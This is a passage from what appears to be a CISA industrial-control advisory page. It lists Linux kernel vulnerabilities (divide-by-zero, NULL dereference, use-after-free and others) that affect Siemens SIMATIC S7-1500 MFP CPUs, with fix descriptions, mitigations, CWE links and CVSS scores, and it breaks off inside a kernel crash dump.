<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_hfsc: fix divide-by-zero in rtsc_min() m2sm() converts a u32 slope to a u64 scaled value. For large inputs (e.g. m1=4000000000), the result can reach 2^32. rtsc_min() stores the difference of two such u64 values in a u32 variable `dsm` and uses it as a divisor. When the difference is exactly 2^32 the truncation yields zero, causing a divide-by-zero oops in the concave-curve intersection path: Oops: divide error: 0000 RIP: 0010:rtsc_min (net/sched/sch_hfsc.c:601) Call Trace: init_ed (net/sched/sch_hfsc.c:629) hfsc_enqueue (net/sched/sch_hfsc.c:1569) [...] Widen `dsm` to u64 and replace do_div() with div64_u64() so the full difference is preserved.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31423">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/369.html">CWE-369 Divide By Zero</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31424</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: x_tables: restrict xt_check_match/xt_check_target extensions for NFPROTO_ARP Weiming Shi says: xt_match and xt_target structs registered with NFPROTO_UNSPEC can be loaded by any protocol family through nft_compat. When such a match/target sets .hooks to restrict which hooks it may run on, the bitmask uses NF_INET_* constants. This is only correct for families whose hook layout matches NF_INET_*: IPv4, IPv6, INET, and bridge all share the same five hooks (PRE_ROUTING ... POST_ROUTING). ARP only has three hooks (IN=0, OUT=1, FORWARD=2) with different semantics. Because NF_ARP_OUT == 1 == NF_INET_LOCAL_IN, the .hooks validation silently passes for the wrong reasons, allowing matches to run on ARP chains where the hook assumptions (e.g. state-&gt;in being set on input hooks) do not hold. This leads to NULL pointer dereferences; xt_devgroup is one concrete example: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000044: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000220-0x0000000000000227] RIP: 0010:devgroup_mt+0xff/0x350 Call Trace: nft_match_eval (net/netfilter/nft_compat.c:407) nft_do_chain (net/netfilter/nf_tables_core.c:285) nft_do_chain_arp (net/netfilter/nft_chain_filter.c:61) nf_hook_slow (net/netfilter/core.c:623) arp_xmit (net/ipv4/arp.c:666) Kernel panic - not syncing: Fatal exception in interrupt Fix it by restricting arptables to NFPROTO_ARP extensions only. Note that arptables-legacy only supports: - arpt_CLASSIFY - arpt_mangle - arpt_MARK that provide explicit NFPROTO_ARP match/target declarations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31424">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1287.html">CWE-1287 Improper Validation of Specified Type of Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31427</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_sip: fix use of uninitialized rtp_addr in process_sdp process_sdp() declares union nf_inet_addr rtp_addr on the stack and passes it to the nf_nat_sip sdp_session hook after walking the SDP media descriptions. However rtp_addr is only initialized inside the media loop when a recognized media type with a non-zero port is found. If the SDP body contains no m= lines, only inactive media sections (m=audio 0 ...) or only unrecognized media types, rtp_addr is never assigned. Despite that, the function still calls hooks-&gt;sdp_session() with &amp;rtp_addr, causing nf_nat_sdp_session() to format the stale stack value as an IP address and rewrite the SDP session owner and connection lines with it. With CONFIG_INIT_STACK_ALL_ZERO (default on most distributions) this results in the session-level o= and c= addresses being rewritten to 0.0.0.0 for inactive SDP sessions. Without stack auto-init the rewritten address is whatever happened to be on the stack. Fix this by pre-initializing rtp_addr from the session-level connection address (caddr) when available, and tracking via a have_rtp_addr flag whether any valid address was established. Skip the sdp_session hook entirely when no valid address exists.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31427">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.8</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31428</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_log: fix uninitialized padding leak in NFULA_PAYLOAD __build_packet_message() manually constructs the NFULA_PAYLOAD netlink attribute using skb_put() and skb_copy_bits(), bypassing the standard nla_reserve()/nla_put() helpers. While nla_total_size(data_len) bytes are allocated (including NLA alignment padding), only data_len bytes of actual packet data are copied. The trailing nla_padlen(data_len) bytes (1-3 when data_len is not 4-byte aligned) are never initialized, leaking stale heap contents to userspace via the NFLOG netlink socket. Replace the manual attribute construction with nla_reserve(), which handles the tailroom check, header setup, and padding zeroing via __nla_reserve(). The subsequent skb_copy_bits() fills in the payload data on top of the properly initialized attribute.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31428">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31431</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31431">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/669.html">CWE-669 Incorrect Resource Transfer Between Spheres</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31441</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Fix memory leak when a wq is reset idxd_wq_disable_cleanup() which is called from the reset path for a workqueue, sets the wq type to NONE, which for other parts of the driver mean that the wq is empty (all its resources were released). Only set the wq type to NONE after its resources are released.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31441">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31446</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: fix use-after-free in update_super_work when racing with umount Commit b98535d09179 ("ext4: fix bug_on in start_this_handle during umount filesystem") moved ext4_unregister_sysfs() before flushing s_sb_upd_work to prevent new error work from being queued via /proc/fs/ext4/xx/mb_groups reads during unmount. However, this introduced a use-after-free because update_super_work calls ext4_notify_error_sysfs() -&gt; sysfs_notify() which accesses the kobject's kernfs_node after it has been freed by kobject_del() in ext4_unregister_sysfs(): update_super_work ext4_put_super ----------------- -------------- ext4_unregister_sysfs(sb) kobject_del(&amp;sbi-&gt;s_kobj) __kobject_del() sysfs_remove_dir() kobj-&gt;sd = NULL sysfs_put(sd) kernfs_put() // RCU free ext4_notify_error_sysfs(sbi) sysfs_notify(&amp;sbi-&gt;s_kobj) kn = kobj-&gt;sd // stale pointer kernfs_get(kn) // UAF on freed kernfs_node ext4_journal_destroy() flush_work(&amp;sbi-&gt;s_sb_upd_work) Instead of reordering the teardown sequence, fix this by making ext4_notify_error_sysfs() detect that sysfs has already been torn down by checking s_kobj.state_in_sysfs, and skipping the sysfs_notify() call in that case. A dedicated mutex (s_error_notify_mutex) serializes ext4_notify_error_sysfs() against kobject_del() in ext4_unregister_sysfs() to prevent TOCTOU races where the kobject could be deleted between the state_in_sysfs check and the sysfs_notify() call.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31446">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31447</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: reject mount if bigalloc with s_first_data_block != 0 bigalloc with s_first_data_block != 0 is not supported, reject mounting it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31447">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31448</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: avoid infinite loops caused by residual data On the mkdir/mknod path, when mapping logical blocks to physical blocks, if inserting a new extent into the extent tree fails (in this example, because the file system disabled the huge file feature when marking the inode as dirty), ext4_ext_map_blocks() only calls ext4_free_blocks() to reclaim the physical block without deleting the corresponding data in the extent tree. This causes subsequent mkdir operations to reference the previously reclaimed physical block number again, even though this physical block is already being used by the xattr block. Therefore, a situation arises where both the directory and xattr are using the same buffer head block in memory simultaneously. The above causes ext4_xattr_block_set() to enter an infinite loop about "inserted" and cannot release the inode lock, ultimately leading to the 143s blocking problem mentioned in [1]. If the metadata is corrupted, then trying to remove some extent space can do even more harm. Also in case EXT4_GET_BLOCKS_DELALLOC_RESERVE was passed, remove space wrongly update quota information. Jan Kara suggests distinguishing between two cases: 1) The error is ENOSPC or EDQUOT - in this case the filesystem is fully consistent and we must maintain its consistency including all the accounting. However these errors can happen only early before we've inserted the extent into the extent tree. So current code works correctly for this case. 2) Some other error - this means metadata is corrupted. We should strive to do as few modifications as possible to limit damage. So I'd just skip freeing of allocated blocks. [1] INFO: task syz.0.17:5995 blocked for more than 143 seconds. Call Trace: inode_lock_nested include/linux/fs.h:1073 [inline] __start_dirop fs/namei.c:2923 [inline] start_dirop fs/namei.c:2934 [inline]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31448">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.4</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31450</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: publish jinode after initialization ext4_inode_attach_jinode() publishes ei-&gt;jinode to concurrent users. It used to set ei-&gt;jinode before jbd2_journal_init_jbd_inode(), allowing a reader to observe a non-NULL jinode with i_vfs_inode still unset. The fast commit flush path can then pass this jinode to jbd2_wait_inode_data(), which dereferences i_vfs_inode-&gt;i_mapping and may crash. Below is the crash I observe: ``` BUG: unable to handle page fault for address: 000000010beb47f4 PGD 110e51067 P4D 110e51067 PUD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 1 UID: 0 PID: 4850 Comm: fc_fsync_bench_ Not tainted 6.18.0-00764-g795a690c06a5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.17.0-2-2 04/01/2014 RIP: 0010:xas_find_marked+0x3d/0x2e0 Code: e0 03 48 83 f8 02 0f 84 f0 01 00 00 48 8b 47 08 48 89 c3 48 39 c6 0f 82 fd 01 00 00 48 85 c9 74 3d 48 83 f9 03 77 63 4c 8b 0f &lt;49&gt; 8b 71 08 48 c7 47 18 00 00 00 00 48 89 f1 83 e1 03 48 83 f9 02 RSP: 0018:ffffbbee806e7bf0 EFLAGS: 00010246 RAX: 000000000010beb4 RBX: 000000000010beb4 RCX: 0000000000000003 RDX: 0000000000000001 RSI: 0000002000300000 RDI: ffffbbee806e7c10 RBP: 0000000000000001 